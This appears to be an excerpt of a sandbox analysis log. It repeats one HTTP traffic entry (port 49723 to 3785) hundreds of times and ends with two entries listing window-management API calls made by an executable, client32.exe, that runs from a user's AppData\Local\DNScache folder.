Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785

Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_111365D0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,	4_2_111365D0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_11157150 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	4_2_11157150
